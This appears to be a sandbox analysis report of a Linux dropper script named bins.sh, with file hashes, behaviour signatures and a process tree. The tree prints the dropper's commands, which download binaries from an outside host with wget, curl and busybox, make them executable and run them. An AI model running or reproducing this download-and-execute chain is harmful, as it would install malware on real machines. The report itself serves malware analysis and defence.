Analysis

  • max time kernel
    150s
  • max time network
    10s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    27-10-2024 05:22

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    85d74baef7ce93fd942b1abca31bf2dd

  • SHA1

    a7e677437c07ce76e9242021261bc10ae3c1728e

  • SHA256

    1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1

  • SHA512

    01166c5328b88a37c6f813c2c230bfb8ab099386a4d9d45d663902833009e012859aa7452ea9d9bff524dc0bf6f3dd938c0df0225b65ece29ab5a364e10a5677

  • SSDEEP

    192:ffd11BAjT2qH0+mhJy/EN71BAjTx9wrKS:ffdJqU+mhJy/ENqyrKS

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Checks CPU configuration 1 TTPs 2 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 4 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 5 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:666
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:674
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
          2⤵
          • System Network Configuration Discovery
          PID:676
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:684
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
          2⤵
          • System Network Configuration Discovery
          PID:696
        • /bin/chmod
          chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
          2⤵
          • File and Directory Permissions Modification
          PID:698
        • /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
          ./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
          2⤵
          • Executes dropped EXE
          PID:699
        • /bin/rm
          rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
          2⤵
            PID:702
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h
            2⤵
            • System Network Configuration Discovery
            PID:704
          • /usr/bin/curl
            curl -O http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h
            2⤵
            • Checks CPU configuration
            • Reads runtime system information
            • System Network Configuration Discovery
            PID:706

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d

          Filesize

          84KB

          MD5

          64ece99ca4ab1c1405f5a3335d64a960

          SHA1

          b7395f2320a5bdadb78943b268708965cdbd1d74

          SHA256

          aaf14287d7a971d4541527262e85e5930bbb7f506cff4808d712843be9f05dae

          SHA512

          bc169075e50ceffd0ce0cc90513bc2f0d8696c01d4132609e31c782ea6c0a755505891e2e23676dd63c3dd00bf97599a9a7e6230e8c3f5166202f5b9be606d41